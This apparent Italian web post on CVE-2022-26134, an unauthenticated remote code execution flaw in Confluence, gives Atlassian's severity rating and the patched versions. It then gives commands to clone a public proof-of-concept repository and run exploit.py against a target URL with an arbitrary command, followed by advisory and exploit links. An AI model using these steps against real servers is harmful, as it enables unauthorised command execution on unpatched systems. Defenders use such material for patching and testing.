
Confluence Server and Data Center - CVE-2022-26134 - PoC della vulnerabilità di gravità critica di esecuzione remota di codice non autenticata
Confluence Server e Data Center - CVE-2022-26134 - PoC della vulnerabilità critica di esecuzione remota di codice non autenticata

Atlassian valuta il livello di gravità di questa vulnerabilità come critico, secondo la scala pubblicata nei livelli di gravità di Atlassian. Tutte le versioni di Confluence Server e Data Center precedenti alle versioni corrette elencate sopra sono interessate da questa vulnerabilità.
Le versioni rilasciate 7.4.17, 7.13.7, 7.14.3, 7.15.2, 7.16.4, 7.17.4 e 7.18.1 contengono una correzione per questo problema.
git clone https://github.com/shamo0/CVE-2022-26134.git
cd CVE-2022-26134
python3 exploit.py https://target.com CMD
https://confluence.atlassian.com/doc/confluence-security-advisory-2022-06-02-1130377146.html
https://github.com/Nwqda/CVE-2022-26134
https://jira.atlassian.com/browse/CONFSERVER-79016
https://bugalert.org/content/notices/2022-06-02-confluence.html